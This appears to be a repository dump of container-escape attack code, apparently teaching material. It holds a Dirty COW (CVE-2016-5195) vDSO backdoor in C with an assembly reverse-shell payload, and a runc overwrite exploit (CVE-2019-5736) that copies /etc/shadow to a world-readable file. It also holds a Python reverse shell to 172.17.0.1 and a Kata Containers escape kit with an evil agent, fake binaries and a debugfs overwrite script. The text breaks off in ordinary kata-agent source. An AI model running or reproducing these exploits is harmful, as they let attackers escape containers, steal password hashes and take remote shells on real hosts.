1,\n\t\tARRAY_SIZE(vdso_patch));\n\n\t/* run \"check\" in a different memory space */\n\tpid = fork();\n\tif (pid == -1) {\n\t\twarn(\"fork\");\n\t\treturn -1;\n\t} else if (pid == 0) {\n\t\tcheck(arg);\n\t}\n\n\targ->stop = false;\n\tpthread_create(&pth1, NULL, madviseThread, arg);\n\tpthread_create(&pth2, NULL, ptrace_thread, arg);\n\n\t/* wait for \"check\" process */\n\tif (waitpid(pid, &status, 0) == -1) {\n\t\twarn(\"waitpid\");\n\t\treturn -1;\n\t}\n\n\t/* tell the 2 threads to stop and wait for them */\n\targ->stop = true;\n\tpthread_join(pth1, NULL);\n\tpthread_join(pth2, NULL);\n\n\t/* check result */\n\tret = WIFEXITED(status) ? WEXITSTATUS(status) : -1;\n\tif (ret == 0) {\n\t\tfprintf(stderr, \"[*] vdso successfully %s\\n\",\n\t\t\targ->do_patch ? \"backdoored\" : \"restored\");\n\t} else {\n\t\tfprintf(stderr, \"[-] failed to win race condition...\\n\");\n\t}\n\n\treturn ret;\n}\n\n/*\n * Apply vDSO patches in the correct order.\n *\n * During the backdoor step, the payload must be written before hijacking the\n * function prologue. During the restore step, the prologue must be restored\n * before removing the payload.\n */\nstatic int exploit(struct mem_arg *arg, bool do_patch)\n{\n\tunsigned int i;\n\tint ret;\n\n\tret = 0;\n\targ->do_patch = do_patch;\n\n\tfor (i = 0; i < ARRAY_SIZE(vdso_patch); i++) {\n\t\tif (do_patch)\n\t\t\targ->patch_number = i;\n\t\telse\n\t\t\targ->patch_number = ARRAY_SIZE(vdso_patch) - i - 1;\n\n\t\tif (exploit_helper(arg) != 0) {\n\t\t\tret = -1;\n\t\t\tbreak;\n\t\t}\n\t}\n\n\treturn ret;\n}\n\nstatic int create_socket(uint16_t port)\n{\n\tstruct sockaddr_in addr;\n\tint enable, s;\n\n\ts = socket(AF_INET, SOCK_STREAM, 0);\n\tif (s == -1) {\n\t\twarn(\"socket\");\n\t\treturn -1;\n\t}\n\n\tenable = 1;\n\tif (setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &enable, sizeof(enable)) == -1)\n\t\twarn(\"setsockopt(SO_REUSEADDR)\");\n\n\taddr.sin_family = AF_INET;\n\taddr.sin_addr.s_addr = INADDR_ANY;\n\taddr.sin_port = port;\n\n\tif (bind(s, (struct sockaddr *) &addr, sizeof(addr)) == -1) {\n\t\twarn(\"failed to bind socket on port %d\", ntohs(port));\n\t\tclose(s);\n\t\treturn -1;\n\t}\n\n\tif (listen(s, 1) == -1) {\n\t\twarn(\"listen\");\n\t\tclose(s);\n\t\treturn -1;\n\t}\n\n\treturn s;\n}\n\n/* interact with reverse connect shell */\nstatic int yeah(struct mem_arg *arg, int s)\n{\n\tstruct sockaddr_in addr;\n\tstruct pollfd fds[2];\n\tsocklen_t addr_len;\n\tchar buf[4096];\n\tnfds_t nfds;\n\tint c, n;\n\n\tfprintf(stderr, \"[*] waiting for reverse connect shell...\\n\");\n\n\taddr_len = sizeof(addr);\n\twhile (1) {\n\t\tc = accept(s, (struct sockaddr *)&addr,\t&addr_len);\n\t\tif (c == -1) {\n\t\t\tif (errno == EINTR)\n\t\t\t\tcontinue;\n\t\t\twarn(\"accept\");\n\t\t\treturn -1;\n\t\t}\n\t\tbreak;\n\t}\n\n\tclose(s);\n\n\tfprintf(stderr, \"[*] enjoy!\\n\");\n\n\tif (fork() == 0) {\n\t\tif (exploit(arg, false) == -1)\n\t\t\tfprintf(stderr, \"[-] failed to restore vDSO\\n\");\n\t\texit(0);\n\t}\n\n\tfds[0].fd = STDIN_FILENO;\n\tfds[0].events = POLLIN;\n\n\tfds[1].fd = c;\n\tfds[1].events = POLLIN;\n\n\tnfds = 2;\n\twhile (nfds > 0) {\n\t\tif (poll(fds, nfds, -1) == -1) {\n\t\t\tif (errno == EINTR)\n\t\t\t\tcontinue;\n\t\t\twarn(\"poll\");\n\t\t\tbreak;\n\t\t}\n\n\t\tif (fds[0].revents == POLLIN) {\n\t\t\tn = read(STDIN_FILENO, buf, sizeof(buf));\n\t\t\tif (n == -1) {\n\t\t\t\tif (errno != EINTR) {\n\t\t\t\t\twarn(\"read(STDIN_FILENO)\");\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t} else if (n == 0) {\n\t\t\t\tbreak;\n\t\t\t} else {\n\t\t\t\twriteall(c, buf, n);\n\t\t\t}\n\t\t}\n\n\t\tif (fds[1].revents == POLLIN) {\n\t\t\tn = read(c, buf, sizeof(buf));\n\t\t\tif (n == -1) {\n\t\t\t\tif (errno != EINTR) {\n\t\t\t\t\twarn(\"read(c)\");\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t} else if (n == 0) {\n\t\t\t\tbreak;\n\t\t\t} else {\n\t\t\t\twriteall(STDOUT_FILENO, buf, n);\n\t\t\t}\n\t\t}\n\t}\n\n\treturn 0;\n}\n\nstatic struct prologue *fingerprint_prologue(void *vdso_addr)\n{\n\tunsigned long clock_gettime_addr;\n\tuint32_t clock_gettime_offset;\n\tuint64_t entry_point;\n\tstruct prologue *p;\n\tint i;\n\n\t/* e_entry */\n\tentry_point = *(uint64_t *)((unsigned char *)vdso_addr + 0x18);\n\tclock_gettime_offset = (uint32_t)entry_point & 0xfff;\n\tclock_gettime_addr = (unsigned long)vdso_addr + clock_gettime_offset;\n\n\tfor (i = 0; i < ARRAY_SIZE(prologues); i++) {\n\t\tp = &prologues[i];\n\t\tif (memcmp((void *)clock_gettime_addr, p->opcodes, p->size) == 0)\n\t\t\treturn p;\n\t}\n\n\treturn NULL;\n}\n\n/*\n * 1.2.3.4:1337\n */\nstatic int parse_ip_port(char *str, uint32_t *ip, uint16_t *port)\n{\n\tchar *p;\n\tint ret;\n\n\tstr = strdup(str);\n\tif (str == NULL) {\n\t\twarn(\"strdup\");\n\t\treturn -1;\n\t}\n\n\tp = strchr(str, ':');\n\tif (p != NULL && p[1] != '\\x00') {\n\t\t*p = '\\x00';\n\t\t*port = htons(atoi(p + 1));\n\t}\n\n\tret = (inet_aton(str, (struct in_addr *)ip) == 1) ? 0 : -1;\n\tif (ret == -1)\n\t\twarn(\"inet_aton(%s)\", str);\n\n\tfree(str);\n\treturn ret;\n}\n\nint main(int argc, char *argv[])\n{\n\tstruct prologue *prologue;\n\tstruct mem_arg arg;\n\tuint16_t port;\n\tuint32_t ip;\n\tint s;\n\n\tip = htonl(PAYLOAD_IP);\n\tport = htons(PAYLOAD_PORT);\n\n\tif (argc > 1) {\n\t\tif (parse_ip_port(argv[1], &ip, &port) != 0)\n\t\t\treturn EXIT_FAILURE;\n\t}\n\n\tfprintf(stderr, \"[*] payload target: %s:%d\\n\",\n\t\tinet_ntoa(*(struct in_addr *)&ip), ntohs(port));\n\n\targ.vdso_addr = get_vdso_addr();\n\tif (arg.vdso_addr == NULL)\n\t\treturn EXIT_FAILURE;\n\n\tprologue = fingerprint_prologue(arg.vdso_addr);\n\tif (prologue == NULL) {\n\t\tfprintf(stderr, \"[-] this vDSO version isn't supported\\n\");\n\t\tfprintf(stderr, \"    add first entry point instructions to prologues\\n\");\n\t\treturn EXIT_FAILURE;\n\t}\n\n\tif (patch_payload(prologue, ip, port) == -1)\n\t\treturn EXIT_FAILURE;\n\n\tif (build_vdso_patch(arg.vdso_addr, prologue) == -1)\n\t\treturn EXIT_FAILURE;\n\n\ts = create_socket(port);\n\tif (s == -1)\n\t\treturn EXIT_FAILURE;\n\n\tif (exploit(&arg, true) == -1) {\n\t\tfprintf(stderr, \"exploit failed\\n\");\n\t\treturn EXIT_FAILURE;\n\t}\n\n\tyeah(&arg, s);\n\n\treturn EXIT_SUCCESS;\n}"
  },
  {
    "path": "code/0304-运行时攻击/01-容器逃逸/CVE-2016-5195/Makefile",
    "content": "CFLAGS := -Wall\nLDFLAGS := -lpthread\n\nall: 0xdeadbeef\n\n0xdeadbeef: 0xdeadbeef.o\n\t$(CC) -o $@ $^ $(LDFLAGS)\n\n0xdeadbeef.o: 0xdeadbeef.c payload.h\n\t$(CC) -o $@ -c $< $(CFLAGS)\n\npayload.h: payload\n\txxd -i $^ $@\n\npayload: payload.s\n\tnasm -f bin -o $@ $^\n\nclean:\n\trm -f *.o *.h 0xdeadbeef"
  },
  {
    "path": "code/0304-运行时攻击/01-容器逃逸/CVE-2016-5195/payload.s",
    "content": "\t\tBITS 64\n\t\t[SECTION .text]\n\t\tglobal _start\n\nSYS_OPEN\tequ 0x2\nSYS_SOCKET\tequ 0x29\nSYS_CONNECT\tequ 0x2a\nSYS_DUP2\tequ 0x21\nSYS_FORK\tequ 0x39\nSYS_EXECVE\tequ 0x3b\nSYS_EXIT\tequ 0x3c\nSYS_READLINK\tequ 0x59\nSYS_GETUID\tequ 0x66\n\nAF_INET\t\tequ 0x2\nSOCK_STREAM\tequ 0x1\n\nIP\t\tequ 0xdeadc0de\t;; patched by 0xdeadbeef.c\nPORT\t\tequ 0x1337\t;; patched by 0xdeadbeef.c\n\n_start:\n\t\t;; save registers\n\t\tpush\trdi\n\t\tpush\trsi\n\t\tpush\trdx\n\t\tpush\trcx\n\n\t\t;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\n\t\t;;\n\t\t;; return if getuid() != 0\n\t\t;;\n\t\t;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\n\n\t\tmov\trax, SYS_GETUID\n\t\tsyscall\n\t\ttest\trax, rax\n\t\tjne\treturn\n\n\t\t;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\n\t\t;;\n\t\t;; check if whithin a container (PROC_PID_INIT_INO = 0xEFFFFFFC)\n\t\t;; return if $(readlink /proc/1/ns/pid) != \"pid:[4026531836]\"\n\t\t;;\n\t\t;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\n\n\t\tcall\tget_strings\n\t\tlea\trsi, [rsp-16]\n\t\tmov\trdx, 16\t\t\t; strlen(\"pid:[4026531836]\")\n\t\tmov\trax, SYS_READLINK\n\t\tsyscall\n\t\tcmp\trax, rdx\n\t\tjne\treturn\n\t\tadd\trdi, 15\t\t\t; \"pid:[4026531836]\"\n\t\tmov\trcx, rdx\n\t\trepe cmpsb\n\t\tjne\treturn\n\n\t\t;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\n\t\t;;\n\t\t;; return if open(\"/tmp/.x\", O_CREAT|O_EXCL, x) == -1\n\t\t;;\n\t\t;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\n\n\t\tmov     rsi, 0x00782e2f706d742f\n\t\tpush    rsi\n\t\tmov     rdi, rsp\n\t\tmov     rsi, 192\n\t\tmov     rax, SYS_OPEN\n\t\tsyscall\n\t\ttest    rax, rax\n\t\tpop     rsi\n\t\tjs      return\n\n\t\t;; fork\n\t\tmov     rax, SYS_FORK\n\t\tsyscall\n\t\ttest    rax, rax\n\t\tjne\treturn\n\n\t\t;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\n\t\t;;\n\t\t;; reverse connect (https://www.exploit-db.com/exploits/35587/)\n\t\t;;\n\t\t;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\n\n\t\t;; sockfd = socket(AF_INET, SOCK_STREAM, 0)\n\t\txor\trsi, rsi\t; 0 out rsi\n\t\tmul\tesi\t\t; 0 out rax, rdx ; rdx = IPPROTO_IP (int: 0)\n\t\tinc\trsi             ; rsi = SOCK_STREAM\n\t\tpush\tAF_INET\n\t\tpop\trdi\n\t\tadd\tal, SYS_SOCKET\n\t\tsyscall\n\n\t\t; copy socket descriptor to rdi for future use\n\t\tpush\trax\n\t\tpop\trdi\n\n\t\t; server.sin_family = AF_INET\n\t\t; server.sin_port = htons(PORT)\n\t\t; server.sin_addr.s_addr = IP\n\t\t; bzero(&server.sin_zero, 8)\n\t\tpush\trdx\n\t\tpush\trdx\n\t\tmov\tdword [rsp + 0x4], IP\n\t\tmov\tword [rsp + 0x2], PORT\n\t\tmov\tbyte [rsp], AF_INET\n\n\t\t;; connect(sockfd, (struct sockaddr *)&server, sockaddr_len)\n\t\tpush\trsp\n\t\tpop\trsi\n\t\tpush\t0x10\n\t\tpop\trdx\n\t\tpush\tSYS_CONNECT\n\t\tpop\trax\n\t\tsyscall\n\t\ttest    rax, rax\n\t\tjs      exit\n\n\t\t;; dup2(sockfd, STDIN); dup2(sockfd, STDOUT); dup2(sockfd, STERR)\n\t\txor\trax, rax\n\t\tpush\t0x3\t\t; loop down file descriptors for I/O\n\t\tpop\trsi\ndup_loop:\n\t\tdec\tesi\n\t\tmov\tal, SYS_DUP2\n\t\tsyscall\n\t\tjne\tdup_loop\n\n\t\t;; execve('//bin/sh', NULL, NULL)\n\t\tpush\trsi\t\t; *argv[] = 0\n\t\tpop\trdx\t\t; *envp[] = 0\n\t\tpush\trsi\t\t; '\\0'\n\t\tmov\trdi, '//bin/sh'\t; str\n\t\tpush\trdi\n\t\tpush\trsp\n\t\tpop\trdi\t\t; rdi = &str (char*)\n\t\txor\trax, rax\n\t\tmov\tal, SYS_EXECVE\n\t\tsyscall\n\nexit:\n\t\txor\trax, rax\n\t\tmov\tal, SYS_EXIT\n\t\tsyscall\n\nreturn:\n\t\t;; restore registers\n\t\tpop\trcx\n\t\tpop     rdx\n\t\tpop     rsi\n\t\tpop     rdi\n\t\t;; get callee address (pushed on the stack by the call instruction)\n\t\tpop     rax\n\t\t;; execute missed instructions (patched by 0xdeadbeef.c)\n\t\tdb\t0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90\n\t\t;; return to callee\n\t\tjmp     rax\n\nget_strings:\n               lea\trdi, [rel $ +8]\n               ret\n               db\t'/proc/1/ns/pid'\n               db\t0\n               db\t'pid:[4026531836]'"
  },
  {
    "path": "code/0304-运行时攻击/01-容器逃逸/CVE-2019-5736/main.go",
    "content": "package main\n\n// Implementation of CVE-2019-5736\n// Created with help from @singe, @_cablethief, and @feexd.\n// This commit also helped a ton to understand the vuln\n// https://github.com/lxc/lxc/commit/6400238d08cdf1ca20d49bafb85f4e224348bf9d\nimport (\n\t\"fmt\"\n\t\"io/ioutil\"\n\t\"os\"\n\t\"strconv\"\n\t\"strings\"\n)\n\n// This is the line of shell commands that will execute on the host\nvar payload = \"#!/bin/bash \\n cat /etc/shadow > /tmp/shadow && chmod 777 /tmp/shadow\"\n\nfunc main() {\n\t// First we overwrite /bin/sh with the /proc/self/exe interpreter path\n\tfd, err := os.Create(\"/bin/sh\")\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\treturn\n\t}\n\tfmt.Fprintln(fd, \"#!/proc/self/exe\")\n\terr = fd.Close()\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\treturn\n\t}\n\tfmt.Println(\"[+] Overwritten /bin/sh successfully\")\n\n\t// Loop through all processes to find one whose cmdline includes runcinit\n\t// This will be the process created by runc\n\tvar found int\n\tfor found == 0 {\n\t\tpids, err := ioutil.ReadDir(\"/proc\")\n\t\tif err != nil {\n\t\t\tfmt.Println(err)\n\t\t\treturn\n\t\t}\n\t\tfor _, f := range pids {\n\t\t\tfbytes, _ := ioutil.ReadFile(\"/proc/\" + f.Name() + \"/cmdline\")\n\t\t\tfstring := string(fbytes)\n\t\t\tif strings.Contains(fstring, \"runc\") {\n\t\t\t\tfmt.Println(\"[+] Found the PID:\", f.Name())\n\t\t\t\tfound, err = strconv.Atoi(f.Name())\n\t\t\t\tif err != nil {\n\t\t\t\t\tfmt.Println(err)\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\t// We will use the pid to get a file handle for runc on the host.\n\tvar handleFd = -1\n\tfor handleFd == -1 {\n\t\t// Note, you do not need to use the O_PATH flag for the exploit to work.\n\t\thandle, _ := os.OpenFile(\"/proc/\"+strconv.Itoa(found)+\"/exe\", os.O_RDONLY, 0777)\n\t\tif int(handle.Fd()) > 0 {\n\t\t\thandleFd = int(handle.Fd())\n\t\t}\n\t}\n\tfmt.Println(\"[+] Successfully got the file handle\")\n\n\t// Now that we have the file handle, lets write to the runc binary and overwrite it\n\t// It will maintain it's executable flag\n\tfor {\n\t\twriteHandle, _ := os.OpenFile(\"/proc/self/fd/\"+strconv.Itoa(handleFd), os.O_WRONLY|os.O_TRUNC, 0700)\n\t\tif int(writeHandle.Fd()) > 0 {\n\t\t\tfmt.Println(\"[+] Successfully got write handle\", writeHandle)\n\t\t\twriteHandle.Write([]byte(payload))\n\t\t\treturn\n\t\t}\n\t}\n}\n"
  },
  {
    "path": "code/0304-运行时攻击/01-容器逃逸/cause-core-dump.c",
    "content": "#include <stdio.h>\n\nint main(void)\n{\n    int *a = NULL;\n    *a = 1;\n    return 0;\n}"
  },
  {
    "path": "code/0304-运行时攻击/01-容器逃逸/tmp-dot-x.py",
    "content": "import os\nimport pty\nimport socket\n\nlhost = \"172.17.0.1\" # 根据实际情况修改\nlport = 10000 # 根据实际情况修改\n\ndef main():\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    s.connect((lhost, lport))\n    os.dup2(s.fileno(), 0)\n    os.dup2(s.fileno(), 1)\n    os.dup2(s.fileno(), 2)\n    os.putenv(\"HISTFILE\", '/dev/null')\n    pty.spawn(\"/bin/bash\")\n    os.remove('/tmp/.x.py')\n    s.close()\n\nif __name__ == \"__main__\":\n    main()"
  },
  {
    "path": "code/0304-运行时攻击/02-安全容器逃逸/build.sh",
    "content": "#!/bin/bash\n\nset -e -x\n\ncurrent_path=`pwd`\nagent_path=$GOPATH/src/github.com/kata-containers/agent/\n\n# build evil agent\ncd $agent_path\ngit checkout -- .\ngit checkout 1.10.0\ncp $current_path/evil_agent_src/* $agent_path\nsed -i 's/VERSION_COMMIT :=.*$/VERSION_COMMIT := 1.10.0-a8007c2969e839b584627d1a7db4cac13af908a6/g' $agent_path/Makefile\nmake\ncd -\ncp $agent_path/kata-agent ./docker/evil-kata-agent\n\n# build reverse shell\ngcc -o ./docker/evil_bin evil_bin.c -static\n\ndocker build -t kata-malware-image:latest docker/\n"
  },
  {
    "path": "code/0304-运行时攻击/02-安全容器逃逸/change_container_runtime.sh",
    "content": "#!/bin/bash\n\nif [ $1 = \"kata\" ]; then\n    cat << EOF > /etc/docker/daemon.json\n{\n  \"runtimes\": {\n    \"kata-runtime\": {\n      \"path\": \"/opt/kata/bin/kata-runtime\"\n    },\n    \"kata-clh\": {\n      \"path\": \"/opt/kata/bin/kata-clh\"\n    },\n    \"kata-qemu\": {\n      \"path\": \"/opt/kata/bin/kata-qemu\"\n    }\n  },\n  \"registry-mirrors\": [\"https://docker.mirrors.ustc.edu.cn/\"]\n}\nEOF\n    cat << EOF > /etc/systemd/system/docker.service.d/kata-containers.conf\n[Service]\nExecStart=\nExecStart=/usr/bin/dockerd -D --add-runtime kata-runtime=/opt/kata/bin/kata-runtime --add-runtime kata-clh=/opt/kata/bin/kata-clh --add-runtime kata-qemu=/opt/kata/bin/kata-qemu --default-runtime=kata-runtime\nEOF\n    systemctl daemon-reload && systemctl restart docker\n\nelif [ $1 = \"runc\" ]; then\n    rm -f /etc/systemd/system/docker.service.d/kata-containers.conf\n    cat << EOF > /etc/docker/daemon.json\n{\n  \"registry-mirrors\": [\"https://docker.mirrors.ustc.edu.cn/\"]\n}\nEOF\n    systemctl daemon-reload && systemctl restart docker\n\nelse \n    echo \"Invalid container runtime.\"\nfi \n\n"
  },
  {
    "path": "code/0304-运行时攻击/02-安全容器逃逸/clean_kata.sh",
    "content": "#!/bin/bash\n\nset -e -x\n\nrm -f /usr/bin/kata*\nrm -r /etc/kata-containers\nrm -r /opt/kata\nrm /etc/docker/daemon.json\nrm /etc/systemd/system/docker.service.d/kata-containers.conf\n\nsystemctl daemon-reload && systemctl restart docker"
  },
  {
    "path": "code/0304-运行时攻击/02-安全容器逃逸/docker/Dockerfile",
    "content": "FROM ubuntu:latest\n\nCOPY bash /bash\nCOPY evil-kata-agent /evil-kata-agent\nCOPY attack.sh /attack.sh\n# Since we're targeting /bin, let's put some fake binaries in the image\nCOPY evil_bin /ls\nCOPY evil_bin /ps\nCOPY evil_bin /rm\n\nRUN chmod +x /attack.sh /evil-kata-agent /ls /ps /rm /bash\n\nENTRYPOINT [\"/attack.sh\"]\n"
  },
  {
    "path": "code/0304-运行时攻击/02-安全容器逃逸/docker/attack.sh",
    "content": "#!/bin/bash\n\nset -e\n\necho -e \"\\t[+] In the evil container\"\necho -e \"\\t[*] Searching for the device...\"\n\nfound_clh_dev=false\nfor path in /sys/dev/block/* ; do\n\tcurr_target=$(readlink $path)\n\tif [[ $curr_target == *\"vda1\"* ]]; then\n    \tdev=$(basename $path)\n    \tguest_fs_major=$(echo $dev | cut -f1 -d:)\n    \tguest_fs_minor=$(echo $dev | cut -f2 -d:)\n    \tfound_clh_dev=true\n    \tbreak\n    fi\ndone\n\nif [ \"$found_clh_dev\" = false ]; then\n\techo -e \"\\t[!] no vda1 device, not on CLH, shutting down...\"\n\texit 1\nfi\n\necho -e \"\\t[+] Device found\"\necho -e \"\\t[*] Mknoding...\"\n\nmknod --mode 0600 /dev/guest_hd b $guest_fs_major $guest_fs_minor\n\necho -e \"\\t[+] Mknoded successfully\"\n# Ok we're on CLH, let's run the attack\necho -e \"\\t[*] Replacing the guest kata-agent...\"\n\ncmd_file=/tmp/debugfs_cmdfile\nrm -rf $cmd_file\ncat <<EOF > $cmd_file\nopen -w /dev/guest_hd\ncd /usr/bin\nrm kata-agent\nwrite /evil-kata-agent kata-agent\nclose -a\nEOF\n\n# Execute cmdfile \n/sbin/debugfs -f $cmd_file\n\necho -e \"\\t[+] Done\"\n"
  },
  {
    "path": "code/0304-运行时攻击/02-安全容器逃逸/evil_agent_src/grpc.go",
    "content": "//\n// Copyright (c) 2017-2019 Intel Corporation\n//\n// SPDX-License-Identifier: Apache-2.0\n//\n\npackage main\n\nimport (\n\t\"bufio\"\n\t\"bytes\"\n\t\"encoding/json\"\n\t\"fmt\"\n\t\"io/ioutil\"\n\t\"os\"\n\t\"os/exec\"\n\t\"path/filepath\"\n\t\"regexp\"\n\t\"strconv\"\n\t\"strings\"\n\t\"syscall\"\n\t\"time\"\n\n\tgpb \"github.com/gogo/protobuf/types\"\n\t\"github.com/kata-containers/agent/pkg/types\"\n\tpb \"github.com/kata-containers/agent/protocols/grpc\"\n\t\"github.com/opencontainers/runc/libcontainer\"\n\t\"github.com/opencontainers/runc/libcontainer/configs\"\n\t\"github.com/opencontainers/runc/libcontainer/seccomp\"\n\t\"github.com/opencontainers/runc/libcontainer/specconv\"\n\t\"github.com/opencontainers/runc/libcontainer/utils\"\n\t\"github.com/opencontainers/runtime-spec/specs-go\"\n\t\"github.com/sirupsen/logrus\"\n\t\"golang.org/x/net/context\"\n\t\"golang.org/x/sys/unix\"\n\t\"google.golang.org/grpc/codes\"\n\tgrpcStatus \"google.golang.org/grpc/status\"\n)\n\ntype agentGRPC struct {\n\tsandbox *sandbox\n\tversion string\n}\n\n// CPU and Memory hotplug\nconst (\n\tcpuRegexpPattern = \"cpu[0-9]*\"\n\tmemRegexpPattern = \"memory[0-9]*\"\n\tlibcontainerPath = \"/run/libcontainer\"\n)\n\nvar (\n\tsysfsCPUOnlinePath          = \"/sys/devices/system/cpu\"\n\tsysfsMemOnlinePath          = \"/sys/devices/system/memory\"\n\tsysfsMemoryBlockSizePath    = \"/sys/devices/system/memory/block_size_bytes\"\n\tsysfsMemoryHotplugProbePath = \"/sys/devices/system/memory/probe\"\n\tsysfsConnectedCPUsPath      = filepath.Join(sysfsCPUOnlinePath, \"online\")\n\tcontainersRootfsPath        = \"/run\"\n\n\t// set when StartTracing() is called.\n\tstartTracingCalled = false\n\n\t// set when StopTracing() is called.\n\tstopTracingCalled = false\n\n\tmodprobePath = \"/sbin/modprobe\"\n)\n\ntype onlineResource struct {\n\tsysfsOnlinePath string\n\tregexpPattern   string\n}\n\ntype cookie map[string]bool\n\nvar emptyResp = &gpb.Empty{}\n\nconst onlineCPUMemWaitTime = 100 * time.Millisecond\n\nvar onlineCPUMaxTries = uint32(100)\n\nconst cpusetMode = 0644\n\n// handleError will log the specified error if wait is false\nfunc handleError(wait bool, err error) error {\n\tif !wait {\n\t\tagentLog.WithError(err).Error()\n\t}\n\n\treturn err\n}\n\n// Online resources, nbResources specifies the maximum number of resources to online.\n// If nbResources is <= 0 then there is no limit and all resources are connected.\n// Returns the number of resources connected.\nfunc onlineResources(resource onlineResource, nbResources int32) (uint32, error) {\n\tfiles, err := ioutil.ReadDir(resource.sysfsOnlinePath)\n\tif err != nil {\n\t\treturn 0, err\n\t}\n\n\tvar count uint32\n\tfor _, file := range files {\n\t\tmatched, err := regexp.MatchString(resource.regexpPattern, file.Name())\n\t\tif err != nil {\n\t\t\treturn count, err\n\t\t}\n\n\t\tif !matched {\n\t\t\tcontinue\n\t\t}\n\n\t\tonlinePath := filepath.Join(resource.sysfsOnlinePath, file.Name(), \"online\")\n\t\tstatus, err := ioutil.ReadFile(onlinePath)\n\t\tif err != nil {\n\t\t\t// resource cold plugged\n\t\t\tcontinue\n\t\t}\n\n\t\tif strings.Trim(string(status), \"\\n\\t \") == \"0\" {\n\t\t\tif err := ioutil.WriteFile(onlinePath, []byte(\"1\"), 0600); err != nil {\n\t\t\t\tagentLog.WithField(\"online-path\", onlinePath).WithError(err).Errorf(\"Could not online resource\")\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tcount++\n\t\t\tif nbResources > 0 && count == uint32(nbResources) {\n\t\t\t\treturn count, nil\n\t\t\t}\n\t\t}\n\t}\n\n\treturn count, nil\n}\n\nfunc onlineCPUResources(nbCpus uint32) error {\n\tresource := onlineResource{\n\t\tsysfsOnlinePath: sysfsCPUOnlinePath,\n\t\tregexpPattern:   cpuRegexpPattern,\n\t}\n\n\tvar count uint32\n\tfor i := uint32(0); i < onlineCPUMaxTries; i++ {\n\t\tr, err := onlineResources(resource, int32(nbCpus-count))\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tcount += r\n\t\tif count == nbCpus {\n\t\t\treturn nil\n\t\t}\n\t\ttime.Sleep(onlineCPUMemWaitTime)\n\t}\n\n\treturn fmt.Errorf(\"only %d of %d were connected\", count, nbCpus)\n}\n\nfunc onlineMemResources() error {\n\tresource := onlineResource{\n\t\tsysfsOnlinePath: sysfsMemOnlinePath,\n\t\tregexpPattern:   memRegexpPattern,\n\t}\n\n\t_, err := onlineResources(resource, -1)\n\treturn err\n}\n\n// updates a cpuset cgroups path visiting each sub-directory in cgroupPath parent and writing\n// the maximal set of cpus in cpuset.cpus file, finally the cgroupPath is updated with the requsted\n//value.\n// cookies are used for performance reasons in order to\n// don't update a cgroup twice.\nfunc updateCpusetPath(cgroupPath string, newCpuset string, cookies cookie) error {\n\t// Each cpuset cgroup parent MUST BE updated with the actual number of vCPUs.\n\t//Start to update from cgroup system root.\n\tcgroupParentPath := cgroupCpusetPath\n\n\tcpusetGuest, err := getCpusetGuest()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// Update parents with max set of current cpus\n\t//Iterate  all parent dirs in order.\n\t//This is needed to ensure the cgroup parent has cpus on needed needed\n\t//by the request.\n\tcgroupsParentPaths := strings.Split(filepath.Dir(cgroupPath), \"/\")\n\tfor _, path := range cgroupsParentPaths {\n\t\t// Skip if empty.\n\t\tif path == \"\" {\n\t\t\tcontinue\n\t\t}\n\n\t\tcgroupParentPath = filepath.Join(cgroupParentPath, path)\n\n\t\t// check if the cgroup was already updated.\n\t\tif cookies[cgroupParentPath] {\n\t\t\tagentLog.WithField(\"path\", cgroupParentPath).Debug(\"cpuset cgroup already updated\")\n\t\t\tcontinue\n\t\t}\n\n\t\tcpusetCpusParentPath := filepath.Join(cgroupParentPath, \"cpuset.cpus\")\n\n\t\tagentLog.WithField(\"path\", cpusetCpusParentPath).Debug(\"updating cpuset parent cgroup\")\n\n\t\tif err := ioutil.WriteFile(cpusetCpusParentPath, []byte(cpusetGuest), cpusetMode); err != nil {\n\t\t\treturn fmt.Errorf(\"Could not update parent cpuset cgroup (%s) cpuset:'%s': %v\", cpusetCpusParentPath, cpusetGuest, err)\n\t\t}\n\n\t\t// add cgroup path to the cookies.\n\t\tcookies[cgroupParentPath] = true\n\t}\n\n\t// Finally update group path with requested value.\n\tcpusetCpusPath := filepath.Join(cgroupCpusetPath, cgroupPath, \"cpuset.cpus\")\n\n\tagentLog.WithField(\"path\", cpusetCpusPath).Debug(\"updating cpuset cgroup\")\n\n\tif err := ioutil.WriteFile(cpusetCpusPath, []byte(newCpuset), cpusetMode); err != nil {\n\t\treturn fmt.Errorf(\"Could not update parent cpuset cgroup (%s) cpuset:'%s': %v\", cpusetCpusPath, cpusetGuest, err)\n\t}\n\n\treturn nil\n}\n\nfunc (a *agentGRPC) onlineCPUMem(req *pb.OnlineCPUMemRequest) error {\n\tif req.NbCpus == 0 && req.CpuOnly {\n\t\treturn handleError(req.Wait, fmt.Errorf(\"requested number of CPUs '%d' must be greater than 0\", req.NbCpus))\n\t}\n\n\t// we are going to update the containers of the sandbox, we have to lock it\n\ta.sandbox.Lock()\n\tdefer a.sandbox.Unlock()\n\n\tif req.NbCpus > 0 {\n\t\tagentLog.WithField(\"vcpus-to-connect\", 